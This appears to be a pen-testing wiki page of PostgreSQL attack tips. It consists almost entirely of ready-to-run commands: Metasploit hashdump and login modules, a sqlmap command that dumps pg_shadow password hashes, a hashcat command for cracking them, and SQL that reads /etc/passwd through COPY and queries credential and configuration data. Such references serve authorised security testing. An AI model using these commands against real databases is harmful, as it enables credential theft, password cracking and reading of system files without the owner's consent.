PostgreSQL

PostgreSQL pen test tips

MSF

use scanner/postgres/postgres_hashdump
use scanner/postgres/postgres_version
use scanner/postgres/postgres_login

DB Accounts

wordlists with default infra/postgresql accounts

ls -lh /usr/share/metasploit-framework/data/wordlists/

Dumping Hashed Passwords

sqlmap -r request.http  --force-ssl --dump -D pg_catalog -T pg_shadow

Cracking

Cracking postgres hashed passwords from postgresql

hashcat -m 28600 -a 0 ../pg.hashes pg.wordlist -r /usr/share/hashcat/rules/best64.rule

Enumeration

CREATE TEMP TABLE pentest (INPUT TEXT);
COPY pentest FROM '/etc/passwd';
SELECT * FROM pentest;

select inet_server_port()
select inet_server_addr()

SELECT version()
SELECT usename FROM pg_user
SELECT datname FROM pg_database;
SELECT * FROM pg_shadow;
SELECT current_setting('data_directory');
SELECT current_setting('hba_file');

PreviousDocker for Pentesters NextActive Directory (AD)

Last updated 4 months ago

Was this helpful?